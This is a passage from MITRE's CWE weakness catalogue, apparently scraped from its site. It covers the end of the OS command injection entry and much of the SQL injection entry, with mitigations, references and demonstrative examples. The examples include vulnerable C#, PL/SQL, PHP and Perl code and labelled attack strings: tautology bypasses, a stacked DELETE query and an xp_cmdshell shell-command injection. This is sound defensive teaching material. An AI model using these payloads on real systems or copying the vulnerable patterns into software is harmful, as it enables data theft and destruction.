Dynamic Analysis with Manual Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Fuzz Tester Framework-based Fuzzer Effectiveness: SOAR Partial
Manual Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Manual Source Code Review (not inspections) Cost effective for partial coverage: Focused Manual Spotcheck - Focused manual analysis of source Effectiveness: High
Automated Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Source code Weakness Analyzer Context-configured Source Code Weakness Analyzer Effectiveness: High
Architecture or Design Review	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Formal Methods / Correct-By-Construction Cost effective for partial coverage: Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) Effectiveness: High

Functional Areas

Program Invocation

Affected Resources

System Process

Memberships

Nature	Type	ID	Name
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	635	Weaknesses Originally Used by NVD from 2008 to 2016
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	714	OWASP Top Ten 2007 Category A3 - Malicious File Execution
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	727	OWASP Top Ten 2004 Category A6 - Injection Flaws
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	741	CERT C Secure Coding Standard (2008) Chapter 8 - Characters and Strings (STR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	744	CERT C Secure Coding Standard (2008) Chapter 11 - Environment (ENV)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	751	2009 Top 25 - Insecure Interaction Between Components
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	801	2010 Top 25 - Insecure Interaction Between Components
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	810	OWASP Top Ten 2010 Category A1 - Injection
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	845	The CERT Oracle Secure Coding Standard for Java (2011) Chapter 2 - Input Validation and Data Sanitization (IDS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	864	2011 Top 25 - Insecure Interaction Between Components
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	875	CERT C++ Secure Coding Section 07 - Characters and Strings (STR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	878	CERT C++ Secure Coding Section 10 - Environment (ENV)
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	929	OWASP Top Ten 2013 Category A1 - Injection
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	990	SFP Secondary Cluster: Tainted Input to Command
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1027	OWASP Top Ten 2017 Category A1 - Injection
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1134	SEI CERT Oracle Secure Coding Standard for Java - Guidelines 00. Input Validation and Data Sanitization (IDS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1165	SEI CERT C Coding Standard - Guidelines 10. Environment (ENV)
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1200	Weaknesses in the 2019 CWE Top 25 Most Dangerous Software Errors
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1337	Weaknesses in the 2021 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1347	OWASP Top Ten 2021 Category A03:2021 - Injection
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1350	Weaknesses in the 2020 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1387	Weaknesses in the 2022 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1409	Comprehensive Categorization: Injection
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1425	Weaknesses in the 2023 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1430	Weaknesses in the 2024 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1435	Weaknesses in the 2025 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1440	OWASP Top Ten 2025 Category A05:2025 - Injection

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Notes

Terminology

The "OS command injection" phrase carries different meanings to different people. For some people, it only refers to cases in which the attacker injects command separators into arguments for an application-controlled program that is being invoked. For some people, it refers to any type of attack that can allow the attacker to execute OS commands of their own choosing. This usage could include untrusted search path weaknesses (CWE-426) that cause the application to find and execute an attacker-controlled program. Further complicating the issue is the case when argument injection (CWE-88) allows alternate command-line switches or options to be inserted into the command line, such as an "-exec" switch whose purpose may be to execute the subsequent argument as a command (this -exec switch exists in the UNIX "find" command, for example). In this latter case, however, CWE-88 could be regarded as the primary weakness in a chain with CWE-78.

Research Gap

More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
PLOVER			OS Command Injection
OWASP Top Ten 2007	A3	CWE More Specific	Malicious File Execution
OWASP Top Ten 2004	A6	CWE More Specific	Injection Flaws
CERT C Secure Coding	ENV03-C		Sanitize the environment when invoking external programs
CERT C Secure Coding	ENV33-C	CWE More Specific	Do not call system()
CERT C Secure Coding	STR02-C		Sanitize data passed to complex subsystems
WASC	31		OS Commanding
The CERT Oracle Secure Coding Standard for Java (2011)	IDS07-J		Do not pass untrusted, unsanitized data to the Runtime.exec() method
Software Fault Patterns	SFP24		Tainted input to command
OMG ASCSM	ASCSM-CWE-78

Related Attack Patterns

CAPEC-ID	Attack Pattern Name
CAPEC-108	Command Line Execution through SQL Injection
CAPEC-15	Command Delimiters
CAPEC-43	Exploiting Multiple Input Interpretation Layers
CAPEC-6	Argument Injection
CAPEC-88	OS Command Injection

References

[REF-140]	Greg Hoglund and Gary McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02-27. <https://www.amazon.com/Exploiting-Software-How-Break-Code/dp/0201786958>. (URL validated: 2023-04-07)
[REF-685]	Pascal Meunier. "Meta-Character Vulnerabilities". 2008-02-20. <https://web.archive.org/web/20100714032622/https://www.cs.purdue.edu/homes/cs390s/slides/week09.pdf>. (URL validated: 2023-04-07)
[REF-686]	Robert Auger. "OS Commanding". 2009-06. <http://projects.webappsec.org/w/page/13246950/OS%20Commanding>. (URL validated: 2023-04-07)
[REF-687]	Lincoln Stein and John Stewart. "The World Wide Web Security FAQ". chapter: "CGI Scripts". 2002-02-04. <https://www.w3.org/Security/Faq/wwwsf4.html>. (URL validated: 2023-04-07)
[REF-688]	Jordan Dimov, Cigital. "Security Issues in Perl Scripts". <https://www.cgisecurity.com/lib/sips.html>. (URL validated: 2023-04-07)
[REF-44]	Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 10: Command Injection." Page 171. McGraw-Hill. 2010.
[REF-690]	Frank Kim. "Top 25 Series - Rank 9 - OS Command Injection". SANS Software Security Institute. 2010-02-24. <https://www.sans.org/blog/top-25-series-rank-9-os-command-injection/>. (URL validated: 2023-04-07)
[REF-45]	OWASP. "OWASP Enterprise Security API (ESAPI) Project". <https://owasp.org/www-project-enterprise-security-api/>. (URL validated: 2025-07-24)
[REF-76]	Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege>. (URL validated: 2023-04-07)
[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 8, "Shell Metacharacters", Page 425. 1st Edition. Addison Wesley. 2006.
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-78. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.
[REF-1449]	Cybersecurity and Infrastructure Security Agency. "Secure by Design Alert: Eliminating OS Command Injection Vulnerabilities". 2024-07-10. <https://www.cisa.gov/resources-tools/resources/secure-design-alert-eliminating-os-command-injection-vulnerabilities>. (URL validated: 2024-07-14)
[REF-1479]	Gregory Larsen, E. Kenneth Hong Fong, David A. Wheeler and Rama S. Moorthy. "State-of-the-Art Resources (SOAR) for Software Vulnerability Detection, Test, and Evaluation". 2014-07. <https://www.ida.org/-/media/feature/publications/s/st/stateoftheart-resources-soar-for-software-vulnerability-detection-test-and-evaluation/p-5061.ashx>. (URL validated: 2025-09-05)
[REF-1481]	D3FEND. "D3FEND: Application Layer Firewall". <https://d3fend.mitre.org/dao/artifact/d3f:ApplicationLayerFirewall/>. (URL validated: 2025-09-06)

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	PLOVER
2006-07-19 (CWE Draft 3, 2006-07-19)
Contributions
Contribution Date	Contributor	Organization
2024-02-29 (CWE 4.15, 2024-07-16)	Abhi Balakrishnan
2024-02-29 (CWE 4.15, 2024-07-16)	Provided diagram to improve CWE usability
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, Relationships, Weakness_Ordinalities
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated Applicable_Platforms, Detection_Factors, Observed_Examples, Potential_Mitigations, References
2024-11-19 (CWE 4.16, 2024-11-19)	CWE Content Team	MITRE
2024-11-19 (CWE 4.16, 2024-11-19)	updated Relationships
2024-07-16 (CWE 4.15, 2024-07-16)	CWE Content Team	MITRE
2024-07-16 (CWE 4.15, 2024-07-16)	updated Alternate_Terms, Common_Consequences, Demonstrative_Examples, Description, Diagram, References
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes, Relationships
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Detection_Factors, References, Relationships, Time_of_Introduction
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Common_Consequences, Description
2022-10-13	CWE Content Team	MITRE
2022-10-13	updated References
2022-06-28	CWE Content Team	MITRE
2022-06-28	updated Observed_Examples, Relationships
2022-04-28	CWE Content Team	MITRE
2022-04-28	updated Demonstrative_Examples
2021-10-28	CWE Content Team	MITRE
2021-10-28	updated Relationships
2021-07-20	CWE Content Team	MITRE
2021-07-20	updated Observed_Examples, Relationships
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Potential_Mitigations, Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated Observed_Examples, Potential_Mitigations
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Potential_Mitigations, Relationships
2019-09-19	CWE Content Team	MITRE
2019-09-19	updated Relationships
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2018-03-27	CWE Content Team	MITRE
2018-03-27	updated Relationships
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings, White_Box_Definitions
2015-12-07	CWE Content Team	MITRE
2015-12-07	updated Relationships
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Detection_Factors, Relationships, Taxonomy_Mappings
2014-06-23	CWE Content Team	MITRE
2014-06-23	updated Relationships
2014-02-18	CWE Content Team	MITRE
2014-02-18	updated Applicable_Platforms, Demonstrative_Examples, Terminology_Notes
2012-10-30	CWE Content Team	MITRE
2012-10-30	updated Observed_Examples, Potential_Mitigations
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings
2011-09-13	CWE Content Team	MITRE
2011-09-13	updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2011-06-27	CWE Content Team	MITRE
2011-06-27	updated Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-03-29	CWE Content Team	MITRE
2011-03-29	updated Demonstrative_Examples, Description
2010-12-13	CWE Content Team	MITRE
2010-12-13	updated Description, Potential_Mitigations
2010-09-27	CWE Content Team	MITRE
2010-09-27	updated Potential_Mitigations
2010-06-21	CWE Content Team	MITRE
2010-06-21	updated Common_Consequences, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Relationships
2010-04-05	CWE Content Team	MITRE
2010-04-05	updated Potential_Mitigations
2010-02-16	CWE Content Team	MITRE
2010-02-16	updated Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2009-12-28	CWE Content Team	MITRE
2009-12-28	updated Detection_Factors
2009-10-29	CWE Content Team	MITRE
2009-10-29	updated Observed_Examples, References
2009-07-27	CWE Content Team	MITRE
2009-07-27	updated Description, Name, White_Box_Definitions
2009-07-17	KDM Analytics
2009-07-17	Improved the White_Box_Definition
2009-05-27	CWE Content Team	MITRE
2009-05-27	updated Name, Related_Attack_Patterns
2009-03-10	CWE Content Team	MITRE
2009-03-10	updated Potential_Mitigations
2009-01-12	CWE Content Team	MITRE
2009-01-12	updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Terminology_Notes
2008-11-24	CWE Content Team	MITRE
2008-11-24	updated Observed_Examples, Relationships, Taxonomy_Mappings
2008-10-14	CWE Content Team	MITRE
2008-10-14	updated Description
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Relationships, Other_Notes, Taxonomy_Mappings
2008-08-15		Veracode
2008-08-15	Suggested OWASP Top Ten 2004 mapping
2008-08-01		KDM Analytics
2008-08-01	added/updated white box definitions
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Time_of_Introduction
2008-07-01	Sean Eidemiller	Cigital
2008-07-01	added/updated demonstrative examples
Previous Entry Names
Change Date	Previous Entry Name
2008-04-11	OS Command Injection
2009-01-12	Failure to Sanitize Data into an OS Command (aka 'OS Command Injection')
2009-05-27	Failure to Preserve OS Command Structure (aka 'OS Command Injection')
2009-07-27	Failure to Preserve OS Command Structure ('OS Command Injection')
2010-06-21	Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')

Weakness ID: 89

View customized information:

Description

Alternate Terms

SQL injection	a common attack-oriented phrase
SQLi	a common abbreviation for "SQL injection"

Common Consequences

Impact	Details
Execute Unauthorized Code or Commands	Scope: Confidentiality, Integrity, Availability Adversaries could execute system commands, typically by changing the SQL statement to redirect output to a file that can then be executed.
Read Application Data	Scope: Confidentiality Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities.
Gain Privileges or Assume Identity; Bypass Protection Mechanism	Scope: Authentication If poor SQL commands are used to check user names and passwords or perform other kinds of authentication, it may be possible to connect to the product as another user with no previous knowledge of the password.
Bypass Protection Mechanism	Scope: Access Control If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL injection vulnerability.
Modify Application Data	Scope: Integrity Just as it may be possible to read sensitive information, it is also possible to modify or even delete this information with a SQL injection attack.

Potential Mitigations

Phase(s)	Mitigation
Architecture and Design	Strategy: Libraries or Frameworks Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly.
Architecture and Design	Strategy: Parameterization If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using "exec" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867]
Architecture and Design; Operation	Strategy: Environment Hardening Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. Specifically, follow the principle of least privilege when creating user accounts to a SQL database. The database users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others' data. Use the strictest permissions possible on all database objects, such as execute-only for stored procedures.
Architecture and Design	For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Implementation	Strategy: Output Encoding While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). Instead of building a new implementation, such features may be available in the database or programming language. For example, the Oracle DBMS_ASSERT package can check or enforce that parameters have certain properties that make them less vulnerable to SQL injection. For MySQL, the mysql_real_escape_string() API function is available in both C and PHP.
Implementation	Strategy: Input Validation Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. When constructing SQL query strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping. Note that proper output encoding, escaping, and quoting is the most effective solution for preventing SQL injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent SQL injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, the name "O'Reilly" would likely pass the validation step, since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the "'" apostrophe character, which would need to be escaped or otherwise handled. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded. When feasible, it may be safest to disallow meta-characters entirely, instead of escaping them. This will provide some defense in depth. After the data is entered into the database, later processes may neglect to escape meta-characters before use, and you may not have control over those processes.
Architecture and Design	Strategy: Enforcement by Conversion When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Implementation	Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. In the context of SQL Injection, error messages revealing the structure of a SQL query can help attackers tailor successful attack strings.
Operation	Strategy: Firewall Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481. Effectiveness: Moderate Note: An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.
Operation; Implementation	Strategy: Environment Hardening When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	943	Improper Neutralization of Special Elements in Data Query Logic
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	564	SQL Injection: Hibernate
CanFollow	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	456	Missing Initialization of a Variable

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	137	Data Neutralization Issues

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

Relevant to the view "Architectural Concepts" (View-1008)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1019	Validate Inputs

Relevant to the view "CISQ Quality Measures (2020)" (View-1305)

Nature	Type	ID	Name
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	564	SQL Injection: Hibernate

Relevant to the view "Weaknesses in OWASP Top Ten (2013)" (View-928)

Nature	Type	ID	Name
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	564	SQL Injection: Hibernate

Modes Of Introduction

Phase	Note
Implementation	REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Implementation	This weakness typically appears in data-rich applications that save user inputs in a database.

Applicable Platforms

Languages	Class: Not Language-Specific (Undetermined Prevalence) SQL (Often Prevalent)
Technologies	Database Server (Undetermined Prevalence)

Likelihood Of Exploit

High

Demonstrative Examples

Example 1

In 2008, a large number of web servers were compromised using the same SQL injection attack string. This single string worked against many different programs. The SQL injection was then used to modify the web sites to serve malicious code.

Example 2

The following code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.

(bad code)

Example Language: C#

...
string userName = ctx.getAuthenticatedUserName();
string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";
sda = new SqlDataAdapter(query, conn);
DataTable dt = new DataTable();
sda.Fill(dt);
...

The query that this code intends to execute follows:

(informative)

SELECT * FROM items WHERE owner = <userName> AND itemname = <itemName>;

However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string:

(attack code)

name' OR 'a'='a

for itemName, then the query becomes the following:

(attack code)

SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name' OR 'a'='a';

The addition of the:

(attack code)

OR 'a'='a

condition causes the WHERE clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:

(attack code)

SELECT * FROM items;

This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner.

Example 3

This example examines the effects of a different malicious value passed to the query constructed and executed in the previous example.

If an attacker with the user name wiley enters the string:

(attack code)

name'; DELETE FROM items; --

for itemName, then the query becomes the following two queries:

(attack code)

Example Language: SQL

SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';
DELETE FROM items;
--'

Many database servers, including Microsoft(R) SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.

Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in the previous example.

If an attacker enters the string

(attack code)

name'; DELETE FROM items; SELECT * FROM items WHERE 'a'='a

Then the following three valid statements will be created:

(attack code)

SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';
DELETE FROM items;
SELECT * FROM items WHERE 'a'='a';

One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from an allowlist of safe values or identify and escape a denylist of potentially malicious values. Allowlists can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, denylisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:

Target fields that are not quoted
Find ways to bypass the need for certain escaped meta-characters
Use stored procedures to hide the injected meta-characters.

Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.

Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they do not protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.

(bad code)

Example Language: SQL

procedure get_item ( itm_cv IN OUT ItmCurTyp, usr in varchar2, itm in varchar2)
is open itm_cv for
' SELECT * FROM items WHERE ' || 'owner = '|| usr || ' AND itemname = ' || itm || ';
end get_item;

Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks.

Example 4

MS SQL has a built in function that enables shell command execution. An SQL injection in such a context could be disastrous. For example, a query of the form:

(bad code)

Example Language: SQL

SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='$user_input' ORDER BY PRICE

Where $user_input is taken from an untrusted source.

If the user provides the string:

(attack code)

'; exec master..xp_cmdshell 'dir' --

The query will take the following form:

(attack code)

SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=''; exec master..xp_cmdshell 'dir' --' ORDER BY PRICE

Now, this query can be broken down into:

a first SQL query: SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='';
a second SQL query, which executes the dir command in the shell: exec master..xp_cmdshell 'dir'
an MS SQL comment: --' ORDER BY PRICE

As can be seen, the malicious input changes the semantics of the query into a query, a shell command execution and a comment.

Example 5

This code intends to print a message summary given the message ID.

(bad code)

Example Language: PHP

$id = $_COOKIE["mid"];
mysql_query("SELECT MessageID, Subject FROM messages WHERE MessageID = '$id'");

The programmer may have skipped any input validation on $id under the assumption that attackers cannot modify the cookie. However, this is easy to do with custom client code or even in the web browser.

While $id is wrapped in single quotes in the call to mysql_query(), an attacker could simply change the incoming mid cookie to:

(attack code)

1432' or '1' = '1

This would produce the resulting query:

(result)

SELECT MessageID, Subject FROM messages WHERE MessageID = '1432' or '1' = '1'

Not only will this retrieve message number 1432, it will retrieve all other messages.

In this case, the programmer could apply a simple modification to the code to eliminate the SQL injection:

(good code)

Example Language: PHP

$id = intval($_COOKIE["mid"]);
mysql_query("SELECT MessageID, Subject FROM messages WHERE MessageID = '$id'");

However, if this code is intended to support multiple users with different message boxes, the code might also need an access control check (CWE-285) to ensure that the application user has the permission to see that message.

Example 6

This example attempts to take a last name provided by a user and enter it into a database.

(bad code)

Example Language: Perl

$userKey = getUserID();
$name = getUserInput();

# ensure only letters, hyphens and apostrophe are allowed
$name = allowList($name, "^a-zA-z'-$");
$query = "INSERT INTO last_names VALUES('$userKey', '$name')";

